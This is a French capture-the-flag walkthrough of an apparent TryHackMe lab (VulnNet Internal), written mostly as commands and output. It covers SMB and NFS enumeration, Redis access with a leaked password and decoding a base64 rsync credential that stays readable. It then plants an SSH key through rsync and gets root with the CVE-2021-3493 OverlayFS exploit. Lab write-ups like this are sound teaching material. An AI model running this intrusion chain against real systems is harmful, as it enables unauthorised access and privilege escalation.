S’abonner
Connexion
Please login to comment
0 Commentaires
VulnNet Entertainment learns from its mistakes, and now they have something new for you…
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.
Énumération avec nmap dans 1ier temps (en mode bourrin…)
nmap -T5 -p- 10.10.57.62
Beaucoup de ports ouvert, mais pas de page web disponible. On va d’abord faire une énumération sur SMB avec enum4linux
enum4linux 10.10.57.62
On a un partage de disponible que l’on peut mapping et listing.
Connexion au partage SMB:
smbclient \\\\10.10.57.62\\shares
Récupération de tous les fichiers avec la commande mget *
Aucune information n’est intéressante mise à part le fichier serices.txt qui contient le 1ier flag.
Redacted
Enumeration sur NFS:
showmount -e 10.10.57.62
résultat :
Export list for 10.10.57.62:
/opt/conf *
mkdir mnt
mount -t nfs 10.10.57.62:/opt/conf mnt
Il faut énumérer tous les fichiers présent dans le partage, en gros regarder dans chaque fichier à la mano…
Finalement, dans le dossier redis/redis.conf on trouve un mot de passe.
C’est la 1ier fois que je rencontre le service redis, donc je découvre et j’ai dû chercher à droit et à gauche pour récupérer des informations. J’ai trouvé ce site qui m’a pas mal aidé.
En 1ier lieu, j’ai l’ai installé comme ceci (ça n’installe que redis-cli) :
apt install redis-tools
Énumération :
redis-cli -h 10.10.57.62 info
Réponse :
NOAUTH Authentication required.
Ok, pas grave on a le mot de passe
Même commande, mais avec l’option -a pour l’authentification :
redis-cli -h 10.10.57.62 -a ‘redacted’ info
Avec la version 4.0.9, on peut faire des recherches sur Google, mais les exploits trouvés ne semble pas collés.
https://www.exploit-db.com/exploits/47195
https://www.exploit-db.com/exploits/44904
On continue l’énumération :
10.10.57.62:6379> keys *
1) “tmp”
2) “marketlist”
3) “internal flag”
4) “authlist”
5) “int”
10.10.57.62:6379> get “internal flag”
“redacted”
10.10.57.62:6379> type authlist
list
10.10.57.62:6379> lrange tmp 1 100
1 “QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==”
2 “QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==”
3 “QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==”
Information trouvé sur le site lzone.de
base64 decode
echo ‘QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==’ | base64 -d
Résultat:
Authorization for rsync://rsync-connect@127.0.0.1 with password redacted
Enumération rsync
Avec le nom du répertoire récupérer “files” on va lister les informations avec cette commande :
rsync -av –list-only rsync://10.10.57.62/files
Ensuite, on va les récupérer dans un dossier rsync qu’on vient juste de créer :
rsync -av rsync://rsync-connect@10.10.57.62/files rsync/
Il n’y a rien dans les différents dossiers d’intéressants (mise à part le flag user), et comme d’habitude, il faut toujours voir si on la possibilité de transférer une clé SSH.
Création d’une paire de clés SSH avec ssh-keygen
Transfert de la clé via rsync :
rsync -avzh ./id_rsa.pub rsync://rsync-connect@10.10.57.62/files/sys-internal/.ssh/authorized_keys –inplace –no-o –no-g
Une fois connecté en SSH, il faut effectuer une énumération locale avec linpeas
On récupère ainsi la version du kernel et de la distribution
La version d’Ubuntu est vulnérable a cet exploit OverlayFS – CVE-2021-3493 . Il existe une box sur TryHackMe qui permet de tester l’exploit.
Il faut copier l’exploit sur la box via python http-server/wget, le compiler
gcc exploit.c -o exploit
changer ses droits d’exécution :
chmod +x exploit
et exécuter l’exploit :
./exploit
#